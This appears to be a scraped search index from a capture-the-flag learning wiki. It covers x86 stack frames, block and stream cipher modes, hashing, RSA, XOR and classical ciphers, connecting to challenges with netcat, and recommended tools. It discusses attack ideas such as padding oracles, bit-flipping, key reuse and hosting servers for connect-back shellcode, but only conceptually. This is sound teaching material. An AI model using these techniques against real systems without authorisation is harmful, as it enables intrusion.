0804840b <say_hi>:\n 804840b: 55 push ebp\n 804840c: 89 e5 mov ebp,esp\n 804840e: 83 ec 08 sub esp,0x8\n 8048411: 83 ec 08 sub esp,0x8\n 8048414: ff 75 08 push DWORD PTR [ebp+0x8]\n 8048417: 68 f0 84 04 08 push 0x80484f0\n 804841c: e8 bf fe ff ff call 80482e0 <printf@plt>\n 8048421: 83 c4 10 add esp,0x10\n 8048424: 90 nop\n 8048425: c9 leave\n 8048426: c3 ret\n\n08048427 <main>:\n 8048427: 8d 4c 24 04 lea ecx,[esp+0x4]\n 804842b: 83 e4 f0 and esp,0xfffffff0\n 804842e: ff 71 fc push DWORD PTR [ecx-0x4]\n 8048431: 55 push ebp\n 8048432: 89 e5 mov ebp,esp\n 8048434: 51 push ecx\n 8048435: 83 ec 14 sub esp,0x14\n 8048438: 89 c8 mov eax,ecx\n 804843a: 83 38 02 cmp DWORD PTR [eax],0x2\n 804843d: 74 07 je 8048446 <main+0x1f>\n 804843f: b8 01 00 00 00 mov eax,0x1\n 8048444: eb 1c jmp 8048462 <main+0x3b>\n 8048446: 8b 40 04 mov eax,DWORD PTR [eax+0x4]\n 8048449: 8b 40 04 mov eax,DWORD PTR [eax+0x4]\n 804844c: 89 45 f4 mov DWORD PTR [ebp-0xc],eax\n 804844f: 83 ec 0c sub esp,0xc\n 8048452: ff 75 f4 push DWORD PTR [ebp-0xc]\n 8048455: e8 b1 ff ff ff call 804840b <say_hi>\n 804845a: 83 c4 10 add esp,0x10\n 804845d: b8 00 00 00 00 mov eax,0x0\n 8048462: 8b 4d fc mov ecx,DWORD PTR [ebp-0x4]\n 8048465: c9 leave\n 8048466: 8d 61 fc lea esp,[ecx-0x4]\n 8048469: c3 ret\n
Skipping over the bulk of main
, you'll see that at 0x8048452
main
's name
local is pushed to the stack because it's the first argument to say_hi
. Then, a call
instruction is executed. call
instructions first push the current instruction pointer to the stack, then jump to their destination. So when the processor begins executing say_hi
at 0x0804840b
, the stack looks like this:
EIP = 0x0804840b (push ebp)\nESP = 0xffff0000\nEBP = 0xffff002c\n\n 0xffff0004: 0xffffa0a0 // say_hi argument 1\nESP -> 0xffff0000: 0x0804845a // Return address for say_hi\n
The first thing say_hi
does is save the current ebp
so that when it returns, ebp
is back where main
expects it to be. The stack now looks like this:
EIP = 0x0804840c (mov ebp, esp)\nESP = 0xfffefffc\nEBP = 0xffff002c\n\n 0xffff0004: 0xffffa0a0 // say_hi argument 1\n 0xffff0000: 0x0804845a // Return address for say_hi\nESP -> 0xfffefffc: 0xffff002c // Saved EBP\n
Again, note how esp
gets smaller when values are pushed to the stack.
Next, the current esp
is saved into ebp
, marking the top of the new stack frame.
EIP = 0x0804840e (sub esp, 0x8)\nESP = 0xfffefffc\nEBP = 0xfffefffc\n\n 0xffff0004: 0xffffa0a0 // say_hi argument 1\n 0xffff0000: 0x0804845a // Return address for say_hi\nESP, EBP -> 0xfffefffc: 0xffff002c // Saved EBP\n
Then, the stack is \"grown\" to accommodate local variables inside say_hi
.
EIP = 0x08048414 (push [ebp + 0x8])\nESP = 0xfffeffec\nEBP = 0xfffefffc\n\n 0xffff0004: 0xffffa0a0 // say_hi argument 1\n 0xffff0000: 0x0804845a // Return address for say_hi\nEBP -> 0xfffefffc: 0xffff002c // Saved EBP\n 0xfffefff8: UNDEFINED\n 0xfffefff4: UNDEFINED\n 0xfffefff0: UNDEFINED\nESP -> 0xfffeffec: UNDEFINED\n
NOTE: stack space is not implicitly cleared!
Now, the 2 arguments to printf
are pushed in reverse order.
EIP = 0x0804841c (call printf@plt)\nESP = 0xfffeffe4\nEBP = 0xfffefffc\n\n 0xffff0004: 0xffffa0a0 // say_hi argument 1\n 0xffff0000: 0x0804845a // Return address for say_hi\nEBP -> 0xfffefffc: 0xffff002c // Saved EBP\n 0xfffefff8: UNDEFINED\n 0xfffefff4: UNDEFINED\n 0xfffefff0: UNDEFINED\n 0xfffeffec: UNDEFINED\n 0xfffeffe8: 0xffffa0a0 // printf argument 2\nESP -> 0xfffeffe4: 0x080484f0 // printf argument 1\n
Finally, printf
is called, which pushes the address of the next instruction to execute.
EIP = 0x080482e0\nESP = 0xfffeffe0\nEBP = 0xfffefffc\n\n 0xffff0004: 0xffffa0a0 // say_hi argument 1\n 0xffff0000: 0x0804845a // Return address for say_hi\nEBP -> 0xfffefffc: 0xffff002c // Saved EBP\n 0xfffefff8: UNDEFINED\n 0xfffefff4: UNDEFINED\n 0xfffefff0: UNDEFINED\n 0xfffeffec: UNDEFINED\n 0xfffeffe8: 0xffffa0a0 // printf argument 2\n 0xfffeffe4: 0x080484f0 // printf argument 1\nESP -> 0xfffeffe0: 0x08048421 // Return address for printf\n
Once printf
has returned, the leave
instruction moves ebp
into esp
, and pops the saved EBP.
EIP = 0x08048426 (ret)\nESP = 0xffff0000\nEBP = 0xffff002c\n\n 0xffff0004: 0xffffa0a0 // say_hi argument 1\nESP -> 0xffff0000: 0x0804845a // Return address for say_hi\n
And finally, ret
pops the saved instruction pointer into eip
which causes the program to return to main with the same esp
, ebp
, and stack contents as when say_hi
was initially called.
EIP = 0x0804845a (add esp, 0x10)\nESP = 0xffff0004\nEBP = 0xffff002c\n\nESP -> 0xffff0004: 0xffffa0a0 // say_hi argument 1\n
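The walkthrough above can be replayed with a small simulation. This is only a sketch: the Stack32 class and its method names are hypothetical, and it assumes 4-byte pushes and a total of 0x10 bytes reserved for locals, which is what the ESP values in the trace imply.

```python
class Stack32:
    '''Toy model of a 32-bit x86 stack (hypothetical helper, not an emulator).'''

    def __init__(self, esp, ebp):
        self.esp = esp
        self.ebp = ebp
        self.mem = {}

    def push(self, value):
        # The stack grows downward: esp shrinks by 4 on every push.
        self.esp -= 4
        self.mem[self.esp] = value

    def pop(self):
        value = self.mem[self.esp]
        self.esp += 4
        return value


s = Stack32(esp=0xffff0008, ebp=0xffff002c)
s.push(0xffffa0a0)      # main pushes say_hi argument 1
s.push(0x0804845a)      # call say_hi: push the return address
s.push(s.ebp)           # push ebp: save the frame pointer of main
s.ebp = s.esp           # mov ebp, esp
s.esp -= 0x10           # reserve space for locals (assumed size)
s.push(0xffffa0a0)      # printf argument 2
s.push(0x080484f0)      # printf argument 1
s.push(0x08048421)      # call printf: push the return address
s.pop()                 # printf returns
s.esp = s.ebp           # leave, part 1: mov esp, ebp
s.ebp = s.pop()         # leave, part 2: pop ebp
eip = s.pop()           # ret: pop the return address into eip

print(hex(eip), hex(s.esp), hex(s.ebp))
```

After the final ret, esp and ebp hold the same values they had just before say_hi was called.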
"}, {"location": "cryptography/overview/", "title": "Overview", "text": ""}, {"location": "cryptography/overview/#cryptography", "title": "Cryptography", "text": "Cryptography is the reason we can use banking apps, transmit sensitive information over the web, and in general protect our privacy. However, a large part of CTFs is breaking widely used encryption schemes which are improperly implemented. The math may seem daunting, but more often than not, a simple understanding of the underlying principles will allow you to find flaws and crack the code.
The word \u201ccryptography\u201d technically means the art of writing codes. When it comes to digital forensics, it\u2019s a method you can use to understand how data is constructed for your analysis.
"}, {"location": "cryptography/overview/#what-is-cryptography-used-for", "title": "What is cryptography used for?", "text": "Uses in every day software
Malicious uses
A Block Cipher is an algorithm which is used in conjunction with a cryptosystem in order to package a message into evenly distributed 'blocks' which are encrypted one at a time.
"}, {"location": "cryptography/what-are-block-ciphers/#definitions", "title": "Definitions", "text": "Note
In this case ~i~ represents an index over the number of blocks in the plaintext. F() and g() represent the functions used to convert plaintext into ciphertext.
"}, {"location": "cryptography/what-are-block-ciphers/#electronic-codebook-ecb", "title": "Electronic Codebook (ECB)", "text": "ECB is the most basic block cipher mode: it splits the plaintext into blocks, encrypts each block independently, and concatenates the results into the ciphertext.
"}, {"location": "cryptography/what-are-block-ciphers/#flaws", "title": "Flaws", "text": "
Because ECB independently encrypts the blocks, patterns in data can still be seen clearly, as shown in the ECB Penguin image below.
Original Image ECB Image Other Block Cipher Modes"}, {"location": "cryptography/what-are-block-ciphers/#cipher-block-chaining-cbc", "title": "Cipher Block Chaining (CBC)", "text": "CBC is an improvement upon ECB where an Initialization Vector is used in order to add randomness. The encrypted previous block is used as the IV for each sequential block meaning that the encryption process cannot be parallelized. CBC has been declining in popularity due to a variety of
Note
Even though the encryption process cannot be parallelized, the decryption process can be parallelized. If the wrong IV is used for decryption it will only affect the first block, as the decryption of all other blocks depends on the ciphertext, not the plaintext.
"}, {"location": "cryptography/what-are-block-ciphers/#propogating-cipher-block-chaining-pcbc", "title": "Propagating Cipher Block Chaining (PCBC)", "text": "PCBC is a less used cipher mode which modifies CBC so that decryption is also not parallelizable. It also cannot be decrypted from an arbitrary point, as changes made during the decryption and encryption process \"propagate\" throughout the blocks, meaning that both the plaintext and ciphertext are used when encrypting or decrypting as seen in the images below.
"}, {"location": "cryptography/what-are-block-ciphers/#counter-ctr", "title": "Counter (CTR)", "text": "
Note
Counter is also known as CM, integer counter mode (ICM), and segmented integer counter (SIC)
CTR mode makes the block cipher similar to a stream cipher and it functions by adding a counter with each block in combination with a nonce and key to XOR the plaintext to produce the ciphertext. Similarly, the decryption process is the exact same except instead of XORing the plaintext, the ciphertext is XORed. This means that the process is parallelizable for both encryption and decryption and you can begin from anywhere as the counter for any block can be deduced easily.
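A minimal sketch of the idea, not a real implementation: the standard library has no block cipher, so the hypothetical keystream_block function below swaps in a SHA-256 hash of the key, nonce and counter as a stand-in for encrypting the counter block with something like AES. The names ctr_xor and start_block are also assumptions made for illustration.

```python
import hashlib


def keystream_block(key, nonce, counter):
    # Stand-in for a real block cipher (assumption): derive one 16-byte
    # keystream block from the key, the nonce and the block counter.
    block_input = key + nonce + counter.to_bytes(8, 'big')
    return hashlib.sha256(block_input).digest()[:16]


def ctr_xor(key, nonce, data, start_block=0):
    # Encryption and decryption are the same XOR operation in CTR mode.
    out = bytearray()
    for offset in range(0, len(data), 16):
        block = keystream_block(key, nonce, start_block + offset // 16)
        chunk = data[offset:offset + 16]
        out.extend(a ^ b for a, b in zip(chunk, block))
    return bytes(out)


key = b'sixteen byte key'
nonce = b'8bytenon'
message = b'CTR mode turns a block cipher into a stream cipher.'
ciphertext = ctr_xor(key, nonce, message)

print(ctr_xor(key, nonce, ciphertext) == message)
# Any block can be decrypted on its own because its counter is known.
print(ctr_xor(key, nonce, ciphertext[16:32], start_block=1))
```

Because each keystream block depends only on the key, nonce and counter, the loop body could run for all blocks in parallel.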
"}, {"location": "cryptography/what-are-block-ciphers/#security-considerations", "title": "Security Considerations", "text": "
If the nonce chosen is non-random, it is important to concatenate the nonce with the counter (high 64 bits to the nonce, low 64 bits to the counter), as adding or XORing the nonce with the counter would break security: an attacker can cause a collision between nonce and counter values. An attacker who is able to provide a plaintext, nonce and counter can then decrypt a block by using the ciphertext as seen in the decryption image.
"}, {"location": "cryptography/what-are-block-ciphers/#padding-oracle-attack", "title": "Padding Oracle Attack", "text": "A Padding Oracle Attack sounds complex, but essentially means abusing a block cipher by changing the length of input and being able to determine the plaintext.
"}, {"location": "cryptography/what-are-block-ciphers/#requirements", "title": "Requirements", "text": "Hashing functions are one-way functions which theoretically provide a unique output for every input. MD5, SHA-1, and other hashes which were once considered secure are now known to have collisions, that is, two different pieces of data which produce the same supposedly unique output.
"}, {"location": "cryptography/what-are-hashing-functions/#string-hashing", "title": "String Hashing", "text": "A string hash is a number or string generated using an algorithm that runs on text or data.
The idea is that each hash should be unique to the text or data (although sometimes it isn\u2019t). For example, the hash for \u201cdog\u201d should be different from other hashes.
You can use command line tools or online resources such as this one. Example: $ echo -n password | md5 5f4dcc3b5aa765d61d8327deb882cf99
Here, \u201cpassword\u201d is hashed with different hashing algorithms:
Generally, when verifying a hash visually, you can simply look at the first and last four characters of the string.
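The same string can also be hashed from Python. This short sketch uses the standard hashlib module; the choice of MD5, SHA-1 and SHA-256 is just an illustration.

```python
import hashlib

text = 'password'.encode()
for name in ('md5', 'sha1', 'sha256'):
    # hashlib.new() looks the algorithm up by name.
    print(name, hashlib.new(name, text).hexdigest())
```

The MD5 line matches the output of the command line example above.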
"}, {"location": "cryptography/what-are-hashing-functions/#file-hashing", "title": "File Hashing", "text": "A file hash is a number or string generated using an algorithm that is run on text or data. The premise is that it should be unique to the text or data. If the file or text changes in any way, the hash will change.
What is it used for? - File and data identification - Password/certificate storage comparison
How can we determine the hash of a file? You can use the md5sum command (or similar).
$ md5sum samplefile.txt\n3b85ec9ab2984b91070128be6aae25eb samplefile.txt\n
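If md5sum is not available, the same digest can be computed with Python. This is a minimal sketch; the function name file_md5 and the chunk size are assumptions, not part of any tool.

```python
import hashlib


def file_md5(path, chunk_size=65536):
    digest = hashlib.md5()
    with open(path, 'rb') as handle:
        # Read in chunks so large files do not have to fit in memory.
        for chunk in iter(lambda: handle.read(chunk_size), b''):
            digest.update(chunk)
    return digest.hexdigest()
```

Calling file_md5('samplefile.txt') should print the same hex string that md5sum reports for that file.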
"}, {"location": "cryptography/what-are-hashing-functions/#hash-collisions", "title": "Hash Collisions", "text": "A collision is when two pieces of data or text have the same cryptographic hash. This is very rare.
What\u2019s significant about collisions is that they can be used to crack password hashes. Passwords are usually stored as hashes on a computer, since it\u2019s hard to get the passwords from hashes.
If you bruteforce by trying every possible piece of text or data, eventually you\u2019ll find something with the same hash. Enter it, and the computer accepts it as if you entered the actual password.
Two different files on the same hard drive with the same cryptographic hash can be very interesting.
\u201cIt\u2019s now well-known that the cryptographic hash function MD5 has been broken,\u201d said Peter Selinger of Dalhousie University. \u201cIn March 2005, Xiaoyun Wang and Hongbo Yu of Shandong University in China published an article in which they described an algorithm that can find two different sequences of 128 bytes with the same MD5 hash.\u201d
For example, he cited this famous pair:
and
Each of these blocks has MD5 hash 79054025255fb1a26e4bc422aef54eb4.
Selinger said that \u201cthe algorithm of Wang and Yu can be used to create files of arbitrary length that have identical MD5 hashes, and that differ only in 128 bytes somewhere in the middle of the file. Several people have used this technique to create pairs of interesting files with identical MD5 hashes.\u201d
Ben Laurie has a nice website that visualizes this MD5 collision. For a non-technical, though slightly outdated, introduction to hash functions, see Steve Friedl\u2019s Illustrated Guide. And here\u2019s a good article from DFI News that explores the same topic.
"}, {"location": "cryptography/what-are-stream-ciphers/", "title": "Stream Ciphers", "text": "A Stream Cipher is used for symmetric key cryptography, or when the same key is used to encrypt and decrypt data. Stream Ciphers encrypt pseudorandom sequences with bits of plaintext in order to generate ciphertext, usually with XOR. A good way to think about Stream Ciphers is to think of them as generating one-time pads from a given state.
"}, {"location": "cryptography/what-are-stream-ciphers/#definitions", "title": "Definitions", "text": "A one time pad is an encryption mechanism whereby the entire plaintext is XOR'd with a random sequence of numbers in order to generate a random ciphertext. The advantage of the one time pad is that it offers an immense amount of security BUT in order for it to be useful, the randomly generated key must be distributed on a separate secure channel, meaning that one time pads have little use in modern day cryptographic applications on the internet. Stream ciphers extend upon this idea by using a key, usually 128 bit in length, in order to seed a pseudorandom keystream which is used to encrypt the text.
"}, {"location": "cryptography/what-are-stream-ciphers/#types-of-stream-ciphers", "title": "Types of Stream Ciphers", "text": ""}, {"location": "cryptography/what-are-stream-ciphers/#synchronous-stream-ciphers", "title": "Synchronous Stream Ciphers", "text": "A Synchronous Stream Cipher generates a keystream based on internal states not related to the plaintext or ciphertext. This means that the stream is generated pseudorandomly outside of the context of what is being encrypted. A binary additive stream cipher is the term used for a stream cipher which XOR's the bits with the bits of the plaintext. Encryption and decryption require that the synchronus state cipher be in the same state, otherwise the message cannot be decrypted.
"}, {"location": "cryptography/what-are-stream-ciphers/#self-synchronizing-stream-ciphers", "title": "Self-synchronizing Stream Ciphers", "text": "A Self-synchronizing Stream Cipher, also known as an asynchronous stream cipher or ciphertext autokey (CTAK), is a stream cipher which uses the previous N digits in order to compute the keystream used for the next N characters.
Note
Seems a lot like block ciphers, doesn't it? That's because the cipher feedback (CFB) block cipher mode is an example of a self-synchronizing stream cipher.
"}, {"location": "cryptography/what-are-stream-ciphers/#stream-cipher-vulnerabilities", "title": "Stream Cipher Vulnerabilities", "text": ""}, {"location": "cryptography/what-are-stream-ciphers/#key-reuse", "title": "Key Reuse", "text": "The key tenet of using stream ciphers securely is to NEVER repeat key use because of the communative property of XOR. If C~1~ and C~2~ have been XOR'd with a key K, retrieving that key K is trivial because C~1~ XOR C~2~ = P~1~ XOR P~2~ and having an english language based XOR means that cryptoanalysis tools such as a character frequency analysis will work well due to the low entropy of the english language.
"}, {"location": "cryptography/what-are-stream-ciphers/#bit-flipping-attack", "title": "Bit-flipping Attack", "text": "Another key tenet of using stream ciphers securely is considering that just because a message has been decrypted, it does not mean the message has not been tampered with. Because decryption is based on state, if an attacker knows the layout of the plaintext, a Man in the Middle (MITM) attack can flip a bit during transit altering the underlying ciphertext. If a ciphertext decrypts to 'Transfer $1000', then a middleman can flip a single bit in order for the ciphertext to decrypt to 'Transfer $9000' because changing a single character in the ciphertext does not affect the state in a synchronus stream cipher.
"}, {"location": "cryptography/what-is-a-substitution-cipher/", "title": "Substitution Cipher", "text": "A Substitution Cipher is system of encryption where different symobls substitute a normal alphabet.
"}, {"location": "cryptography/what-is-a-vigenere-cipher/", "title": "Vigenere Cipher", "text": "A Vigenere Cipher is an extended Caesar Cipher where a message is encrypted using various Caesar shifted alphabets.
The following table can be used to encode a message:
"}, {"location": "cryptography/what-is-a-vigenere-cipher/#encryption", "title": "Encryption", "text": "For example, encrypting the text SUPERSECRET
with CODE
would follow this process:
CODE
gets padded to the length of SUPERSECRET
so the key becomes CODECODECOD
SUPERSECRET
we use the table to get the Alphabet to use, in this instance row C
and column S
U
UISITGHGTSW
C
U
S
SUPERSECRET
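The table lookup is equivalent to adding the key letter's position to the message letter's position, modulo 26. A minimal sketch, assuming uppercase A-Z input only; the function name vigenere is hypothetical.

```python
from itertools import cycle
from string import ascii_uppercase as ALPHABET


def vigenere(text, key, decrypt=False):
    sign = -1 if decrypt else 1
    out = []
    # cycle() repeats the key, which is the same as padding it to the
    # length of the message.
    for letter, key_letter in zip(text, cycle(key)):
        shift = sign * ALPHABET.index(key_letter)
        out.append(ALPHABET[(ALPHABET.index(letter) + shift) % 26])
    return ''.join(out)


print(vigenere('SUPERSECRET', 'CODE'))
print(vigenere('UISITGHGTSW', 'CODE', decrypt=True))
```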
The Caesar Cipher or Caesar Shift is a cipher which uses the alphabet in order to encode texts.
CAESAR
encoded with a shift of 8 is KIMAIZ
so ABCDEFGHIJKLMNOPQRSTUVWXYZ
becomes IJKLMNOPQRSTUVWXYZABCDEFGH
ROT13 is the same thing but with a fixed shift of 13. The Caesar Cipher is trivial to bruteforce because there are only 25 possible shifts.
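A short sketch of both the shift and the bruteforce, assuming uppercase A-Z input; the function name caesar is hypothetical.

```python
from string import ascii_uppercase as ALPHABET


def caesar(text, shift):
    # Build the shifted alphabet, then map each letter onto it.
    shifted = ALPHABET[shift % 26:] + ALPHABET[:shift % 26]
    return text.translate(str.maketrans(ALPHABET, shifted))


print(caesar('CAESAR', 8))
# Bruteforce: try every shift and look for readable output.
for shift in range(1, 26):
    print(shift, caesar('KIMAIZ', -shift))
```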
"}, {"location": "cryptography/what-is-rsa/", "title": "RSA", "text": "RSA, which is an abbreviation of the author's names (Rivest\u2013Shamir\u2013Adleman), is a cryptosystem which allows for asymmetric encryption. Asymmetric cryptosystems are alos commonly referred to as Public Key Cryptography where a public key is used to encrypt data and only a secret, private key can be used to decrypt the data.
"}, {"location": "cryptography/what-is-rsa/#definitions", "title": "Definitions", "text": "If public n, public e, private d are all very large numbers and a message m holds true for 0 < m < n, then we can say:
(m^e^)^d^ \u2261 m (mod n)
Note
The triple equals sign refers to modular congruence, which here means that there exists an integer k such that (m^e^)^d^ = kn + m
RSA is viable because it is incredibly hard to find d even with m, n, and e because factoring large numbers is an arduous process.
"}, {"location": "cryptography/what-is-rsa/#implementation", "title": "Implementation", "text": "RSA follows 4 steps to be implemented: 1. Key Generation 2. Encryption 3. Decryption
"}, {"location": "cryptography/what-is-rsa/#key-generation", "title": "Key Generation", "text": "We are going to follow along Wikipedia's small numbers example in order to make this idea a bit easier to understand.
Note
In this example we are using Carmichael's totient function where \u03bb(n) = lcm(\u03bb(p), \u03bb(q)), but Euler's totient function is perfectly valid to use with RSA. Euler's totient is \u03c6(n) = (p \u2212 1)(q \u2212 1)
Calculate \u03bb(n) = lcm(p-1, q-1)
Choose a public exponent e such that 1 < e < \u03bb(n) and e is coprime to \u03bb(n) (they share no common factor other than 1). The standard in most cases is 65537, but we will be using:
Now we have a public key of (3233, 17) and a private key of (3233, 413)
"}, {"location": "cryptography/what-is-rsa/#encryption", "title": "Encryption", "text": "With the public key, m can be encrypted trivially
The ciphertext is equal to m^e^ mod n or:
c = m^17^ mod 3233
"}, {"location": "cryptography/what-is-rsa/#decryption", "title": "Decryption", "text": "With the private key, m can be decrypted trivially as well
The plaintext is equal to c^d^ mod n or:
m = c^413^ mod 3233
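The three steps can be sketched end to end with Python's built-in pow. The primes p = 61 and q = 53 and the message m = 65 are assumptions taken to match the public key (3233, 17) and private key (3233, 413) above; real keys use primes that are hundreds of digits long.

```python
from math import gcd

p, q = 61, 53                # assumed primes for this small example
n = p * q                    # public modulus
lam = (p - 1) * (q - 1) // gcd(p - 1, q - 1)   # lcm(p - 1, q - 1)
e = 17                       # public exponent
assert gcd(e, lam) == 1      # e must be coprime to lambda(n)
d = pow(e, -1, lam)          # private exponent (needs Python 3.8+)

m = 65                       # example message, must satisfy 0 < m < n
c = pow(m, e, n)             # encryption: c = m^e mod n
recovered = pow(c, d, n)     # decryption: m = c^d mod n
print(n, lam, d, recovered)
```

Using the three-argument form of pow keeps the intermediate numbers small, which matters once the exponents are large.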
"}, {"location": "cryptography/what-is-rsa/#exploitation", "title": "Exploitation", "text": "From the RsaCtfTool README
Attacks:
Data can be represented in different bases. For a computer to understand a character such as 'A', it needs a numerical representation in Base 2, or binary.
"}, {"location": "cryptography/what-is-xor/#xor-basics", "title": "XOR Basics", "text": "An XOR or eXclusive OR is a bitwise operation indicated by ^
and shown by the following truth table:
So XORing the bytes 0xA0 ^ 0x2C
translates to:
0b10001100
is equivalent to 0x8C
. A cool property of XOR is that it is reversible, meaning 0x8C ^ 0x2C = 0xA0
and 0x8C ^ 0xA0 = 0x2C
XOR is a cheap way to encrypt data with a password. Any data can be encrypted using XOR as shown in this Python example:
>>> data = 'CAPTURETHEFLAG'\n>>> key = 'A'\n>>> encrypted = ''.join([chr(ord(x) ^ ord(key)) for x in data])\n>>> encrypted\n'\\x02\\x00\\x11\\x15\\x14\\x13\\x04\\x15\\t\\x04\\x07\\r\\x00\\x06'\n>>> decrypted = ''.join([chr(ord(x) ^ ord(key)) for x in encrypted])\n>>> decrypted\n'CAPTURETHEFLAG'\n
This can be extended using a multibyte key by iterating in parallel with the data.
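One way to sketch the multibyte case is with itertools.cycle, which repeats the key alongside the data. The key b'KEY' and the function name xor_with_key are made up for illustration.

```python
from itertools import cycle


def xor_with_key(data, key):
    # cycle() repeats the key so it runs in parallel with the data.
    return bytes(a ^ b for a, b in zip(data, cycle(key)))


encrypted = xor_with_key(b'CAPTURETHEFLAG', b'KEY')
print(encrypted.hex())
print(xor_with_key(encrypted, b'KEY'))
```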
"}, {"location": "cryptography/what-is-xor/#exploiting-xor-encryption", "title": "Exploiting XOR Encryption", "text": ""}, {"location": "cryptography/what-is-xor/#single-byte-xor-encryption", "title": "Single Byte XOR Encryption", "text": "Single Byte XOR Encryption is trivial to bruteforce as there are only 255 key combinations to try.
"}, {"location": "cryptography/what-is-xor/#multibyte-xor-encryption", "title": "Multibyte XOR Encryption", "text": "Multibyte XOR gets exponentially harder the longer the key, but if the encrypted text is long enough, character frequency analysis is a viable method to find the key. Character Frequency Analysis means that we split the cipher text into groups based on the number of characters in the key. These groups then are bruteforced using the idea that some letters appear more frequently in the english alphabet than others.
"}, {"location": "faq/connecting-to-services/", "title": "How to connect to services", "text": "Note
While service challenges are often connected to with netcat or PuTTY, solving them will sometimes require using a scripting language like Python. CTF players often use Python alongside pwntools.
You can run pwntools right in your browser by using repl.it.
"}, {"location": "faq/connecting-to-services/#using-netcat", "title": "Using netcat", "text": "netcat
is a networking utility found on macOS and Linux operating systems that allows for easy connections to CTF challenges. Service challenges will commonly give you an address and a port to connect to. The syntax for connecting to a service challenge with netcat is nc <ip> <port>
.
Windows users can connect to service challenges using ConEmu, which can be downloaded here. Connecting to service challenges with ConEmu is done by running nc <ip> <port>
.
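When a challenge needs scripting, the first thing netcat does (connect and read what the service sends) can be sketched with Python's standard socket module. The function name read_banner, the timeout and the buffer size are assumptions made for illustration.

```python
import socket


def read_banner(host, port, timeout=5.0):
    # Open a TCP connection and return the first chunk the service sends.
    with socket.create_connection((host, port), timeout=timeout) as conn:
        return conn.recv(4096).decode(errors='replace')
```

Call it with the address and port given by the challenge, for example read_banner('127.0.0.1', 1337) for a service running locally on a hypothetical port.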
Occasionally, certain kinds of exploits will require a server to connect back to. Some examples are connect back shellcode, cross site request forgery (CSRF), or blind cross site scripting (XSS).
"}, {"location": "faq/i-need-a-server/#i-just-a-web-server", "title": "I just a web server", "text": "If you just need a web server to host simple static websites or check access logs, we recommend using PythonAnywhere to host a simple web application. You can program a simple web application in popular Python web frameworks (e.g. Flask) and host it there for free.
"}, {"location": "faq/i-need-a-server/#i-need-a-real-server", "title": "I need a real server", "text": "If you need a real server (perhaps to run complex calculations or for shellcode to connect back to), we recommend DigitalOcean. DigitalOcean has a cheap $4-6/month plan for a small server that can be freely configured to do whatever you need.
"}, {"location": "faq/recommended-software/", "title": "Recommended Software", "text": "Generally in cyber security competitions, it is up to you and your team to determine what software to use. In some cases you may even end up creating new tools to give you an edge! That being said, here are some applications that we recommend for most competitors for most competitions.
"}, {"location": "faq/recommended-software/#disassemblersdecompilers", "title": "Disassemblers/Decompilers", "text": "Ghidra
Ghidra is a disassembler and decompiler that is open source and free to use. Released by the NSA, Ghidra is a capable tool and is the recommended disassembler for most use cases. An alternative is IDA Pro (a cyber security industry standard), however IDA Pro is not free and licenses are very expensive.
Binary Ninja
Binary Ninja is a commercial disassembler (with a free demo application) that provides an aesthetic and easy to use interface for binary reverse engineering. It also has a Web-UI which can be used freely. Binary Ninja's API and intermediate language make it superior to other disassemblers for certain use cases.
Pwndbg for GDB
Pwndbg is a plugin for the GNU Debugger (gdb) which makes it easier to dynamically reverse an application by stepping through its execution. In order to use pwndbg you will first need to have gdb installed via a Linux virtual machine or similar.
WinDbg
WinDbg is a debugger for Windows applications.
Burp Suite
Burp Suite is an HTTP proxy and set of tools which allow you to view, edit and replay your HTTP requests. While Burp Suite is a commercial tool, it offers a free version which is very capable and usually all that's needed.
sqlmap
sqlmap is a penetration testing tool that automates the process of detecting and exploiting SQL injection flaws. It's open source and freely available.
Google Chrome
Google Chrome is a web browser with a suite of developer tools and extensions. These tools and extensions can be useful when investigating a web application.
Wireshark
Wireshark is a PCAP analysis tool which allows you to analyze and record network traffic.
VMware
VMware is a company that creates virtualization software that allows you to run other operating systems within your existing operating system. While their products are not generally free, their software is best in class for virtualization.
VMware Fusion, VMware Workstation, and VMware Player are three of their virtualization products that can be used on your computer to run other OSes. VMware Player is free to use for Windows and Linux.
VirtualBox
VirtualBox is open source virtualization software which allows you to virtualize other operating systems. It's very similar to VMware products but free for all OSes. It is generally slower than VMware but works well enough for most people.
Python
Python is an easy-to-learn, widely used programming language which supports complex applications as well as small scripts. It has a large community which provides thousands of useful packages. Python is widely used in the cyber security industry and is generally the recommended language to use in CTF competition.
pwntools
Pwntools is a Python package which makes interacting with processes and networks easy. It is a recommended library for interacting with binary exploitation and networking based CTF challenges.
Note
You can run pwntools right in your browser by using repl.it. Create a new Python repl and install the pwntools
package. After that you'll be able to use pwntools directly from your browser without having to install anything.
CyberChef
CyberChef is a simple web app for analysing and decoding data without having to deal with complex tools or programming languages.
Forensics is the art of recovering the digital trail left on a computer. There are plenty of methods to find data which is seemingly deleted, not stored, or worse, covertly recorded.
An important part of forensics is having the right tools, as well as being familiar with the following topics:
File Extensions are not the sole way to identify the type of a file. Files have certain leading bytes called file signatures which allow programs to parse the data in a consistent manner. Files can also contain additional \"hidden\" data called metadata which can be useful in finding out information about the context of a file's data.
"}, {"location": "forensics/what-are-file-formats/#file-signatures", "title": "File Signatures", "text": "File signatures (also known as File Magic Numbers) are bytes within a file used to identify the format of the file. Generally they\u2019re 2-4 bytes long, found at the beginning of a file.
"}, {"location": "forensics/what-are-file-formats/#what-is-it-used-for", "title": "What is it used for?", "text": "Files can sometimes come without an extension, or with incorrect ones. We use file signature analysis to identify the format (file type) of the file. Programs need to know the file type in order to open it properly.
"}, {"location": "forensics/what-are-file-formats/#how-do-you-find-the-file-signature", "title": "How do you find the file signature?", "text": "You need to be able to look at the binary data that constitutes the file you\u2019re examining. To do this, you\u2019ll use a hexadecimal editor. Once you find the file signature, you can check it against file signature repositories such as Gary Kessler\u2019s.
"}, {"location": "forensics/what-are-file-formats/#example", "title": "Example", "text": "The file above, when opened in a Hex Editor, begins with the bytes FFD8FFE0 00104A46 494600
or in ASCII \u02c7\u00ff\u02c7\u2021 JFIF
where \\x00
and \\x10
lack symbols.
Searching in Gary Kessler\u2019s database shows that this file signature belongs to a JPEG/JFIF graphics file
, exactly what we suspect.
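The lookup can also be scripted. This sketch checks the leading bytes against a tiny, hand-picked table of well-known signatures; the SIGNATURES table and the identify function are hypothetical and far from a complete database.

```python
SIGNATURES = {
    bytes.fromhex('ffd8ff'): 'JPEG image',
    bytes.fromhex('89504e470d0a1a0a'): 'PNG image',
    bytes.fromhex('25504446'): 'PDF document',
    bytes.fromhex('504b0304'): 'ZIP archive',
}


def identify(header):
    # Compare the start of the file with each known magic number.
    for magic, name in SIGNATURES.items():
        if header.startswith(magic):
            return name
    return 'unknown'


# The leading bytes from the example above.
header = bytes.fromhex('FFD8FFE000104A46494600')
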